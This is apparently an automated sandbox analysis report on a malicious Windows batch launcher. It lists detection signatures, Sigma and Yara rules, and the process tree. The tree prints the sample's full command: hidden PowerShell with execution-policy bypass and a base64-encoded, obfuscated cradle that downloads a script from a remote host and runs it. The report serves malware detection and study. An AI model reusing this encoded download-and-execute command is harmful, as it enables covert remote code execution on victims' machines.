Windows
Analysis Report
launcher (1).bat
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Yara detected Obfuscated Powershell
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
cmd.exe (PID: 8004 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\launc her (1).ba t" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 8012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 8060 cmdline:
powershell -WindowSt yle Hidden -NoP -W 1 -EP Bypas s -Enc IAA gAC4AKAAiA HsAMgB9AHs AMQB9AHsAM AB9ACIALQB mACAAJwBFA CcALAAnAEk AYQBiAGwAJ wAsACcAUwB FAHQALQBWA GEAUgAnACk AIAAgACgAJ wBUACcAKwA nADMAUwBaA FAAMQAnACk AIAAgACgAI ABbAFQAeQB wAGUAXQAoA CIAewAwAH0 AewAxAH0Ae wAyAH0AewA zAH0AewA0A H0AIgAtAGY AJwBOACcAL AAnAGUAVAA nACwAJwAuA EMAUgBlAGQ ARQBuAHQAS QBhAEwAJwA sACcAYwAnA CwAJwBBAEM AaABlACcAK QAgACAAKQA gADsAIAAgA CgAJgAoACI AewAyAH0Ae wAxAH0AewA wAH0AIgAgA C0AZgAnAHQ AJwAsACcAY wAnACwAJwB OAGUAdwAtA E8AYgBqAGU AJwApACAAK AAiAHsAMgB 9AHsAMwB9A HsAMQB9AHs AMAB9ACIAL QBmACAAJwB 0ACcALAAnA G4AJwAsACc ATgBlAHQAJ wAsACcALgB XAGUAYgBDA GwAaQBlACc AKQApAC4AI gBQAFIATwB gAFgAeQAiA C4AIgBjAFI AZQBEAGAAZ QBOAFQAaQB gAEEAYABsA HMAIgA9ACA AIAAoACAAI AAmACgAIgB 7ADAAfQB7A DEAfQAiAC0 AZgAgACcAa QB0ACcALAA nAGUATQAnA CkAIAAgACg AIgBWAEEAU gBJAEEAYgA iACsAIgBMA CIAKwAiAEU AOgBUACIAK wAiADMAcwB 6AFAAIgArA CIAMQAiACk AIAApAC4AI gB2AGEATAB gAFUAZQAiA DoAOgAiAGQ AYABFAGYAY QBVAEwAdAB uAEUAdABXA E8AUgBLAGA AYwBgAFIAZ QBgAEQARQB uAHQASQBhA EwAUwAiADs AJgAoACIAe wAxAH0AewA wAH0AIgAtA GYAIAAnAHI AJwAsACcAa QB3ACcAKQA oACgAIgB7A DIAfQB7ADg AfQB7ADQAf QB7ADkAfQB 7ADEAfQB7A DMAfQB7ADc AfQB7ADAAf QB7ADUAfQB 7ADYAfQAiA C0AZgAnAG8 AYQBkAC8Ac ABvAHcAZQB yACcALAAnA C4AMQAyACc ALAAnAGgAd AB0AHAAOgA vAC8AJwAsA CcAOAA6ADg AMAA4ADAAL wAnACwAJwA yACcALAAnA HMAaABlAGw AbAAnACwAJ wAvACcALAA nAGQAbwB3A G4AbAAnACw AJwAxADkAJ wAsACcALgA xADYAOAAuA DEAMAAxACc AKQApAC0AV QBzAGUAQgB hAHMAaQBjA FAAYQByAHM AaQBuAGcAf AAmACgAIgB 7ADEAfQB7A DAAfQAiAC0 AZgAnAHgAJ wAsACcAaQB lACcAKQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_ObfuscatedPowershell | Yara detected Obfuscated Powershell | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: |